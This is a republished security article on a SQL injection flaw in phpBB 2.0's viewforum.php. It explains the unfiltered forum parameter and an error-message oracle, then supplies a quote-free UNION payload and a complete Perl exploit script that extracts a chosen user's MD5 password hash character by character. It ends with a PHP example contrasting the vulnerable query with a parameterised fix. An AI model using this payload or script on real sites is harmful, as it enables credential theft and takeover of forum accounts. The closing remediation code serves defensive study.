PHP Injection Case Study
Published: 2024-06-02  Source: compiled by 明輝站
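PHP injection example. It is hard to find a complete article online about PHP injection together with exploit code, so I spent a few weeks grinding through MySQL and PHP. Below are my takeaways; I hope they prompt better contributions from others!
I believe everyone is already very familiar with ASP injection. PHP injection is harder than ASP injection, because PHP's magic_quotes_gpc option is a real headache: no quotes may appear in the injection. PHP is mostly paired with MySQL, and MySQL's functional shortcomings, seen from another angle, do to some extent prevent SQL injection attacks. I will give a concrete example here, using phpBB 2.0:
In viewforum.php there is a variable that is not filtered: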
if ( isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS[POST_FORUM_URL]) ) ? intval($HTTP_GET_VARS[POST_FORUM_URL]) : intval($HTTP_POST_VARS[POST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
It is this forum parameter, and the code below puts it directly into the query:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
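If this were ASP, I believe many people would already know how to inject it. If the forum specified by this forum_id does not exist, $result will be empty, so the message Could not obtain forums information is returned and the code below cannot go on to execute: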
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id); // ****************************************
The key is the line marked with asterisks. It calls session_pagestart($user_ip, $thispage_id), a function defined in session.php. The code is too long to paste in full; anyone interested can read it themselves. The important point is that this function also calls session_begin(), as session_begin($user_id, $user_ip, $thispage_id, TRUE), which is defined in the same file and contains the following code:
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));
$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
}
}
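Here session_page is defined in MySQL as an integer, and its value is $page_id, which is $forum_id. If what gets inserted is not an integer, an error is raised and the message Error creating new session : session_begin appears. So the value given to $forum_id matters a great deal, and I set it to: -1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57. No quotes! Although this specifies a forum_id that does not exist, the query result it returns is not necessarily empty. It guesses whether the ASCII value of the first character of the password of the user with user_id 2 is 57. If it is, $result in the first piece of code in this article is not empty, so the problematic function session_pagestart is executed. What gets inserted is not an integer, so of course it fails and Error creating new session : session_begin is displayed, which shows that you guessed the first character correctly. The other positions work the same way.
Without this error message, I think it would be hard to tell whether the injection had succeeded even when it had, so error messages turn out to be very helpful too. That is the end of the analysis. Below is a piece of test code; with slight modification it can be applied to other similar cases of guessing an MD5 password. Here I use the return condition for the English version; for Chinese and other languages, just change the return condition.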
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;
print " ***********************\n";
print " phpbb viewforum.php exp\n";
print " code by pinkeyes\n";
print " www.icehack.com\n";
print " ************************\n";
print "please enter the weak file's url:\n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php\n";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack\n";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!\n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);
if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwd\n";
}
}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luck\n";}
else{
print "bad luck,work failed!\n";}
As for an exploit program for the recent phpBB 2.0.6 search.php issue, the code above only needs slight modification. If there are errors, please point them out at www.icehack.com.
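
The root cause in viewforum.php above is that $forum_id reaches an unquoted numeric position in the SQL, where quote escaping has no effect. The following is an added example, not phpBB code and not part of the original article, that puts this pattern beside a hardened lookup; the forums table layout, the function names and the sample input are constructed for illustration, and it assumes the pdo_sqlite extension is available.

```php
<?php
// Added example (not phpBB code). Table, column and function names are hypothetical.
// Constructed sample data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE forums (forum_id INTEGER PRIMARY KEY, forum_name TEXT)');
$db->exec("INSERT INTO forums VALUES (1, 'General')");

// Constructed input in the same quote-free shape the article describes.
$input = '-1 union select 1,1';

// Quote escaping (what magic_quotes_gpc applied through addslashes) leaves this
// value unchanged, because it contains nothing that needs escaping.
var_dump(addslashes($input) === $input);

// Vulnerable pattern from the article: the raw value is concatenated into the SQL.
function find_forum_vulnerable(PDO $db, string $forum_id): array
{
    $sql = "SELECT forum_id, forum_name FROM forums WHERE forum_id = $forum_id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function find_forum_hardened(PDO $db, string $forum_id): array
{
    $id = filter_var($forum_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // Every invalid value gets the same "forum does not exist" outcome,
        // so the response cannot be used to tell one malformed input from another.
        return [];
    }
    $stmt = $db->prepare('SELECT forum_id, forum_name FROM forums WHERE forum_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The injected value changes what the vulnerable query returns for a forum
// that does not exist; the hardened lookup rejects it and still serves id 1.
var_dump(count(find_forum_vulnerable($db, $input)));
var_dump(count(find_forum_hardened($db, $input)));
var_dump(count(find_forum_hardened($db, '1')));
```

The same integer validation belongs on every value that later reaches an unquoted SQL position, including the $page_id that session_begin() writes into session_page.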